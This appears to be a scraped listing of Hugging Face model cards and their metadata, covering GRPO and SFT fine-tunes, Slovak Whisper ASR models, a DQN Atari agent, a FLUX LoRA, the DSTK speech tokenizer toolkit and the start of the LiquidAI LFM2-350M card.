tags:
- generated_from_trainer
- trl
- grpo
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-4-sub-v3
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/1jn7f1hv)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
ryzax/1.5B-v82
|
ryzax
| 2025-09-23T15:01:42Z | 1 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"grpo",
"trl",
"conversational",
"arxiv:2402.03300",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-22T04:26:21Z |
---
library_name: transformers
model_name: 1.5B-v82
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for 1.5B-v82
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="ryzax/1.5B-v82", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/muennighoff/s2/runs/roh89jpg)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.24.0.dev0
- Transformers: 4.56.1
- Pytorch: 2.9.0.dev20250827+cu128
- Datasets: 4.0.0
- Tokenizers: 0.22.0
## Citations
Cite GRPO as:
```bibtex
@article{shao2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
hayangSKEL/blockassist
|
hayangSKEL
| 2025-09-23T14:59:36Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"whistling alert shrew",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-12T11:24:41Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- whistling alert shrew
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
dommmm01/SLAXYNI
|
dommmm01
| 2025-09-23T14:59:24Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:59:24Z |
---
license: apache-2.0
---
|
patrickamadeus/nanoVLM-230M-8k-ft-coco-caption-instruct-800
|
patrickamadeus
| 2025-09-23T14:59:21Z | 0 | 0 |
nanovlm
|
[
"nanovlm",
"safetensors",
"vision-language",
"multimodal",
"research",
"image-text-to-text",
"license:mit",
"region:us"
] |
image-text-to-text
| 2025-09-23T14:58:45Z |
---
# For reference on model card metadata, see the spec: https://github.com/huggingface/hub-docs/blob/main/modelcard.md?plain=1
# Doc / guide: https://huggingface.co/docs/hub/model-cards
library_name: nanovlm
license: mit
pipeline_tag: image-text-to-text
tags:
- vision-language
- multimodal
- research
---
**nanoVLM** is a minimal and lightweight Vision-Language Model (VLM) designed for efficient training and experimentation. Built using pure PyTorch, the entire model architecture and training logic fits within ~750 lines of code. It combines a ViT-based image encoder (SigLIP-B/16-224-85M) with a lightweight causal language model (SmolLM2-135M), resulting in a compact 222M parameter model.
For more information, check out the base model on https://huggingface.co/lusxvr/nanoVLM-222M.
**Usage:**
Clone the nanoVLM repository: https://github.com/huggingface/nanoVLM.
Follow the install instructions and run the following code:
```python
from models.vision_language_model import VisionLanguageModel
model = VisionLanguageModel.from_pretrained("patrickamadeus/nanoVLM-230M-8k-ft-coco-caption-instruct-800")
```
|
erikbozik/whisper-small-sk
|
erikbozik
| 2025-09-23T14:56:52Z | 9 | 0 | null |
[
"safetensors",
"whisper",
"speech",
"asr",
"slovak",
"parliament",
"legal",
"politics",
"sk",
"dataset:erikbozik/slovak-plenary-asr-corpus",
"base_model:openai/whisper-small",
"base_model:finetune:openai/whisper-small",
"license:mit",
"model-index",
"region:us"
] | null | 2025-06-18T12:38:35Z |
---
language:
- sk
tags:
- speech
- asr
- whisper
- slovak
- parliament
- legal
- politics
base_model: openai/whisper-small
datasets:
- erikbozik/slovak-plenary-asr-corpus
metrics:
- wer
model-index:
- name: whisper-small-sk
results:
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: Common Voice 21 (Slovak test set)
type: common_voice
metrics:
- name: WER
type: wer
value: 25.7
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: FLEURS (Slovak test set)
type: fleurs
metrics:
- name: WER
type: wer
value: 10.6
license: mit
---
# Whisper Small — Fine-tuned on Slovak Plenary ASR Corpus
This model is a fine-tuned version of [`openai/whisper-small`](https://huggingface.co/openai/whisper-small).
It is adapted for **Slovak ASR** using the [Slovak Plenary ASR Corpus](https://huggingface.co/datasets/erikbozik/slovak-plenary-asr-corpus): **2,806 hours** of aligned, ≤30 s speech–text pairs from official plenary sessions of the **Slovak National Council**.
- **Language:** Slovak
- **Domain:** Parliamentary / formal speech
- **Training data:** 2,806 h
- **Intended use:** Slovak speech recognition; strongest in formal/public-speaking contexts
## 🧪 Evaluation
| Dataset | Base WER | Fine-tuned WER | Δ (abs) |
|---|---:|---:|---:|
| Common Voice 21 (sk) | 58.4 | **25.7** | -32.7 |
| FLEURS (sk) | 36.1 | **10.6** | -25.5 |
*Numbers from the paper’s final benchmark runs.*
## 🔧 Training Details
- **Framework:** Hugging Face Transformers
- **Hardware:** NVIDIA A10 GPUs
- **Epochs:** up to 3 with early stopping on validation WER
- **Learning rate:** ~**40× smaller** than Whisper pretraining LR
## ⚠️ Limitations
- Domain bias toward parliamentary speech (e.g., political vocabulary, formal register).
- As with Whisper models generally, occasional hallucinations may appear; consider temperature fallback / compression-ratio checks at inference time.
- Multilingual performance is not guaranteed (full-parameter finetuning emphasized Slovak).
## 📄 Paper & Citation
Comming soon
## 🙏 Acknowledgements
This work was supported by [**VÚB Banka**](https://www.vub.sk) who provided the GPU resources and backing necessary to accomplish it, enabling progress in Slovak ASR research.
|
erikbozik/whisper-medium-sk
|
erikbozik
| 2025-09-23T14:56:28Z | 10 | 0 | null |
[
"safetensors",
"whisper",
"speech",
"asr",
"slovak",
"parliament",
"legal",
"politics",
"sk",
"dataset:erikbozik/slovak-plenary-asr-corpus",
"base_model:openai/whisper-medium",
"base_model:finetune:openai/whisper-medium",
"license:mit",
"model-index",
"region:us"
] | null | 2025-06-18T13:34:27Z |
---
language:
- sk
tags:
- speech
- asr
- whisper
- slovak
- parliament
- legal
- politics
base_model: openai/whisper-medium
datasets:
- erikbozik/slovak-plenary-asr-corpus
metrics:
- wer
model-index:
- name: whisper-medium-sk
results:
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: Common Voice 21 (Slovak test set)
type: common_voice
metrics:
- name: WER
type: wer
value: 18
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: FLEURS (Slovak test set)
type: fleurs
metrics:
- name: WER
type: wer
value: 7.6
license: mit
---
# Whisper Medium — Fine-tuned on Slovak Plenary ASR Corpus
This model is a fine-tuned version of [`openai/whisper-medium`](https://huggingface.co/openai/whisper-medium).
It is adapted for **Slovak ASR** using the [Slovak Plenary ASR Corpus](https://huggingface.co/datasets/erikbozik/slovak-plenary-asr-corpus): **2,806 hours** of aligned, ≤30 s speech–text pairs from official plenary sessions of the **Slovak National Council**.
- **Language:** Slovak
- **Domain:** Parliamentary / formal speech
- **Training data:** 2,806 h
- **Intended use:** Slovak speech recognition; strongest in formal/public-speaking contexts
## 🧪 Evaluation
| Dataset | Base WER | Fine-tuned WER | Δ (abs) |
|---|---:|---:|---:|
| Common Voice 21 (sk) | 38.0 | **18.0** | -20.0 |
| FLEURS (sk) | 18.7 | **7.6** | -11.1 |
*Numbers from the paper’s final benchmark runs.*
## 🔧 Training Details
- **Framework:** Hugging Face Transformers
- **Hardware:** NVIDIA A10 GPUs
- **Epochs:** up to 3 with early stopping on validation WER
- **Learning rate:** ~**40× smaller** than Whisper pretraining LR
## ⚠️ Limitations
- Domain bias toward parliamentary speech (e.g., political vocabulary, formal register).
- As with Whisper models generally, occasional hallucinations may appear; consider temperature fallback / compression-ratio checks at inference time.
- Multilingual performance is not guaranteed (full-parameter finetuning emphasized Slovak).
## 📄 Paper & Citation
Coming soon
## 🙏 Acknowledgements
This work was supported by [**VÚB Banka**](https://www.vub.sk) who provided the GPU resources and backing necessary to accomplish it, enabling progress in Slovak ASR research.
|
erikbozik/whisper-large-v3-turbo-sk
|
erikbozik
| 2025-09-23T14:56:01Z | 22 | 0 | null |
[
"safetensors",
"whisper",
"speech",
"asr",
"slovak",
"parliament",
"legal",
"politics",
"sk",
"dataset:erikbozik/slovak-plenary-asr-corpus",
"base_model:openai/whisper-large-v3-turbo",
"base_model:finetune:openai/whisper-large-v3-turbo",
"license:mit",
"model-index",
"region:us"
] | null | 2025-09-09T09:08:34Z |
---
language:
- sk
tags:
- speech
- asr
- whisper
- slovak
- parliament
- legal
- politics
base_model: openai/whisper-large-v3-turbo
datasets:
- erikbozik/slovak-plenary-asr-corpus
metrics:
- wer
model-index:
- name: whisper-large-v3-turbo-slovak-parliament
results:
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: Common Voice 21 (Slovak test set)
type: common_voice
metrics:
- name: WER
type: wer
value: 13.2
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: FLEURS (Slovak test set)
type: fleurs
metrics:
- name: WER
type: wer
value: 6.4
license: mit
---
# Whisper Large-v3 Turbo — Fine-tuned on Slovak Parliamentary ASR Corpus
This model is a fine-tuned version of [`openai/whisper-large-v3-turbo`](https://huggingface.co/openai/whisper-large-v3-turbo).
It is adapted for **Slovak ASR** using the [Slovak Parliamentary ASR Corpus](https://huggingface.co/datasets/erikbozik/slovak-parliamentary-asr-corpus): **2,806 hours** of aligned, ≤30 s speech–text pairs from official plenary sessions of the **Slovak National Council**.
- **Language:** Slovak
- **Domain:** Parliamentary / formal speech
- **Training data:** 2,806 h
- **Intended use:** Slovak speech recognition; strongest in formal/public-speaking contexts
## 🧪 Evaluation
| Dataset | Base WER | Fine-tuned WER | Δ (abs) |
|---|---:|---:|---:|
| Common Voice 21 (sk) | 31.7 | **13.2** | -18.5 |
| FLEURS (sk) | 10.7 | **6.4** | -4.3 |
*Numbers from the paper’s final benchmark runs.*
## 🔧 Training Details
- **Framework:** Hugging Face Transformers
- **Hardware:** NVIDIA A10 GPUs
- **Epochs:** up to 3 with early stopping on validation WER
- **Learning rate:** ~**40× smaller** than Whisper pretraining LR
## ⚠️ Limitations
- Domain bias toward parliamentary speech (e.g., political vocabulary, formal register).
- As with Whisper models generally, occasional hallucinations may appear; consider temperature fallback / compression-ratio checks at inference time.
- Multilingual performance is not guaranteed (full-parameter finetuning emphasized Slovak).
## 📄 Paper & Citation
Coming soon
## 🙏 Acknowledgements
This work was supported by [**VÚB Banka**](https://www.vub.sk) who provided the GPU resources and backing necessary to accomplish it, enabling progress in Slovak ASR research.
|
wonderxxx/blockassist
|
wonderxxx
| 2025-09-23T14:55:08Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"lazy peckish alligator",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-21T10:09:15Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- lazy peckish alligator
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
SoloWayG/Molecule_transformer
|
SoloWayG
| 2025-09-23T14:54:39Z | 0 | 1 | null |
[
"license:bsd-3-clause",
"region:us"
] | null | 2025-06-17T08:47:36Z |
---
license: bsd-3-clause
---
|
Simar28/dqn-SpaceInvadersNoFrameskip-v4
|
Simar28
| 2025-09-23T14:53:14Z | 0 | 0 |
stable-baselines3
|
[
"stable-baselines3",
"SpaceInvadersNoFrameskip-v4",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] |
reinforcement-learning
| 2025-09-23T14:52:45Z |
---
library_name: stable-baselines3
tags:
- SpaceInvadersNoFrameskip-v4
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: DQN
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: SpaceInvadersNoFrameskip-v4
type: SpaceInvadersNoFrameskip-v4
metrics:
- type: mean_reward
value: 713.00 +/- 147.87
name: mean_reward
verified: false
---
# **DQN** Agent playing **SpaceInvadersNoFrameskip-v4**
This is a trained model of a **DQN** agent playing **SpaceInvadersNoFrameskip-v4**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3)
and the [RL Zoo](https://github.com/DLR-RM/rl-baselines3-zoo).
The RL Zoo is a training framework for Stable Baselines3
reinforcement learning agents,
with hyperparameter optimization and pre-trained agents included.
## Usage (with SB3 RL Zoo)
RL Zoo: https://github.com/DLR-RM/rl-baselines3-zoo<br/>
SB3: https://github.com/DLR-RM/stable-baselines3<br/>
SB3 Contrib: https://github.com/Stable-Baselines-Team/stable-baselines3-contrib
SBX (SB3 + Jax): https://github.com/araffin/sbx
Install the RL Zoo (with SB3 and SB3-Contrib):
```bash
pip install rl_zoo3
```
```
# Download model and save it into the logs/ folder
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga Simar28 -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
If you installed the RL Zoo3 via pip (`pip install rl_zoo3`), from anywhere you can do:
```
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga Simar28 -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
## Training (with the RL Zoo)
```
python -m rl_zoo3.train --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
# Upload the model and generate video (when possible)
python -m rl_zoo3.push_to_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/ -orga Simar28
```
## Hyperparameters
```python
OrderedDict([('batch_size', 32),
('buffer_size', 100000),
('env_wrapper',
['stable_baselines3.common.atari_wrappers.AtariWrapper']),
('exploration_final_eps', 0.01),
('exploration_fraction', 0.1),
('frame_stack', 4),
('gradient_steps', 1),
('learning_rate', 0.0001),
('learning_starts', 100000),
('n_timesteps', 1000000.0),
('optimize_memory_usage', False),
('policy', 'CnnPolicy'),
('target_update_interval', 1000),
('train_freq', 4),
('normalize', False)])
```
# Environment Arguments
```python
{'render_mode': 'rgb_array'}
```
|
eserder/thibaut_ia_1
|
eserder
| 2025-09-23T14:52:22Z | 0 | 0 |
diffusers
|
[
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] |
text-to-image
| 2025-09-23T14:22:16Z |
---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: eserder
---
# Thibaut_Ia_1
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `eserder` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "eserder",
"lora_weights": "https://huggingface.co/eserder/thibaut_ia_1/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('eserder/thibaut_ia_1', weight_name='lora.safetensors')
image = pipeline('eserder').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## Training details
- Steps: 2000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/eserder/thibaut_ia_1/discussions) to add images that show off what you’ve made with this LoRA.
|
SaketR1/bias-grpo-custom-rm-10000q-5e
|
SaketR1
| 2025-09-23T14:51:25Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"base_model:microsoft/phi-2",
"base_model:finetune:microsoft/phi-2",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T13:55:31Z |
---
base_model: microsoft/phi-2
library_name: transformers
model_name: bias-grpo-custom-rm-10000q-5e
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for bias-grpo-custom-rm-10000q-5e
This model is a fine-tuned version of [microsoft/phi-2](https://huggingface.co/microsoft/phi-2).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="SaketR1/bias-grpo-custom-rm-10000q-5e", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/saketr1-uiuc/huggingface/runs/7vnd4fmq)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.20.0
- Transformers: 4.56.1
- Pytorch: 2.8.0+cu126
- Datasets: 4.1.1
- Tokenizers: 0.22.0
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
maximedb/Llama-3-70B-Instruct-twentle-messages-sft-hybrid
|
maximedb
| 2025-09-23T14:51:15Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:meta-llama/Llama-3.1-8B-Instruct",
"base_model:finetune:meta-llama/Llama-3.1-8B-Instruct",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T14:51:08Z |
---
base_model: meta-llama/Llama-3.1-8B-Instruct
library_name: transformers
model_name: Llama-3-70B-Instruct-twentle-messages-sft-hybrid
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for Llama-3-70B-Instruct-twentle-messages-sft-hybrid
This model is a fine-tuned version of [meta-llama/Llama-3.1-8B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="maximedb/Llama-3-70B-Instruct-twentle-messages-sft-hybrid", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.4.1+cu124
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
thefirstgoku/23SEP_inter_v32_1
|
thefirstgoku
| 2025-09-23T14:50:53Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T14:49:35Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
DiscreteSpeech/DSTK
|
DiscreteSpeech
| 2025-09-23T14:50:38Z | 0 | 1 | null |
[
"en",
"zh",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T03:16:00Z |
---
license: apache-2.0
language:
- en
- zh
---
> We choose to go to the moon, not because they are easy, but because they are hard.
# Discrete Speech Tokenization Toolkit [[English](README.md)|[Chinese](README_CN.md)]
The Discrete Speech Tokenization Toolkit (DSTK) is an open-source speech processing toolkit designed to provide a complete solution for speech discretization. It supports converting continuous speech signals into discrete speech tokens, reconstructing speech waveforms from discrete speech tokens, and converting text content into speech tokens. DSTK offers efficient, flexible, and modular foundational components for tasks such as speech understanding, speech synthesis, and multimodal learning.
## Release Notes:
V1.0
This release of DSTK includes three modules:
1. Semantic Tokenzier
- Encode the semantic information of speech into discrete speech tokens.
- frame rate: 25Hz; codebook size: 4096,supports both Chinese and English
2. Semantic Detokenizer
- Decode the discrete speech tokens into audible speech waveforms to reconstruct the speech
- Supports both Chinese and English
3. Text2token (T2U)
- Convert text content into speech tokens
## TTS pipeline
As shown in the figure below, the 3 module could form a pipeline for TTS task.
<p align="center"><img src="figs/TTS.jpg" width="1200"></p>
## Non-parallel Speech Reconstruction Pipeline
As shown in figure below, the tokenizer and detokenizer could also form a pipeline for speech reconstruction task.
<p align="center"><img src="figs/reconstruction.jpg" width="1200"></p>
These pipelines achieved top-tier performance on TTS and speech reconstruction on the seed-tts-eval dataset:
<p align="center"><img src="figs/eval1.jpg" width="1200"></p>
<p align="center"><img src="figs/eval2.jpg" width="1200"></p>
We also evaluated the ASR performance of our semantic tokenizer using a LLM as backbone. Our model achieve comparable performance to models that use continuous speech representation.
<p align="center"><img src="figs/eval3.jpg" width="1200"></p>
## More details about the 3 models:
- [Semantic Tokenizer](semantic_tokenizer/f40ms/README.md)
- [Semantic Detokenizer](semantic_detokenizer/README.md)
- [Text2Token](text2token/README.md)
## Installation
### Create a separate environment if needed
```bash
# Create a conda env with python_version>=3.10 (you could also use virtualenv)
conda create -n dstk python=3.10
conda activate dstk
```
## More tools to be release:
- 12.5Hz Streaming Semantic Tokenizer and Detokenizer
- Speech Normalized Tokenizer
- Speech Disentangled Tokenizer
# Core Developers:
[Daxin Tan]([email protected]), [Dehua Tao]([email protected]), [Yusen Sun]([email protected]) and [Xiao Chen]([email protected])
## Contributors:
[Hanlin Zhang]([email protected])
## Former Contributors:
Jingcheng Tian, Xinshan Zeng, Liangyou Li, Jing Xu, Mingyu Cui, Dingdong Wang
|
LiquidAI/LFM2-350M
|
LiquidAI
| 2025-09-23T14:49:28Z | 14,279 | 129 |
transformers
|
[
"transformers",
"safetensors",
"lfm2",
"text-generation",
"liquid",
"edge",
"conversational",
"en",
"ar",
"zh",
"fr",
"de",
"ja",
"ko",
"es",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-07-10T12:01:24Z |
---
library_name: transformers
license: other
license_name: lfm1.0
license_link: LICENSE
language:
- en
- ar
- zh
- fr
- de
- ja
- ko
- es
pipeline_tag: text-generation
tags:
- liquid
- lfm2
- edge
---
<center>
<div style="text-align: center;">
<img
src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/7_6D7rWrLxp2hb6OHSV1p.png"
alt="Liquid AI"
style="width: 100%; max-width: 66%; height: auto; display: inline-block; margin-bottom: 0.5em; margin-top: 0.5em;"
/>
</div>
<div style="display: flex; justify-content: center;">
<a href="https://playground.liquid.ai/chat">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Playground" style="margin-bottom: 1em;">
<title>Playground</title>
<g>
<rect fill="#fff" width="200" height="200"></rect>
<rect fill="url(#x)" x="200" width="800" height="200"></rect>
</g>
<g transform="translate(35, 30) scale(0.45, 0.45)">
<path d="M172.314 129.313L172.219 129.367L206.125 188.18C210.671 195.154 213.324 203.457 213.324 212.382C213.324 220.834 210.956 228.739 206.839 235.479L275.924 213.178L167.853 33.6L141.827 76.9614L172.314 129.313Z" fill="black"/>
<path d="M114.217 302.4L168.492 257.003C168.447 257.003 168.397 257.003 168.352 257.003C143.515 257.003 123.385 237.027 123.385 212.387C123.385 203.487 126.023 195.204 130.55 188.24L162.621 132.503L135.966 86.7327L60.0762 213.183L114.127 302.4H114.217Z" fill="black"/>
<path d="M191.435 250.681C191.435 250.681 191.43 250.681 191.425 250.686L129.71 302.4H221.294L267.71 226.593L191.435 250.686V250.681Z" fill="black"/>
</g>
<g transform="translate(50, 0)" aria-hidden="true" fill="#fff" text-anchor="start" font-family="Verdana,DejaVu Sans,sans-serif" font-size="110">
<text x="255" y="148" textLength="619" fill="#000" opacity="0.1">Playground</text>
<text x="245" y="138" textLength="619">Playground</text>
</g>
<linearGradient id="x" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
<stop offset="100%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
<a href="https://leap.liquid.ai/?utm_source=huggingface&utm_medium=modelcards">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Leap" style="margin-bottom: 1em;">
<title>Leap</title>
<g>
<rect fill="#000" width="500" height="200"></rect>
</g>
<g transform="translate(100, 45) scale(3.5, 3.5)" fill="#fff">
<path d="M13.8512 28.0769C12.5435 28.0769 11.4025 27.8205 10.4281 27.3077C9.45375 26.7692 8.68452 26.0128 8.12042 25.0385C7.58196 24.0641 7.31273 22.9359 7.31273 21.6538V3.76923H0.389648V0H11.4666V21.6538C11.4666 22.4744 11.6973 23.1282 12.1589 23.6154C12.6204 24.0769 13.2486 24.3077 14.0435 24.3077H20.582V28.0769H13.8512Z"/>
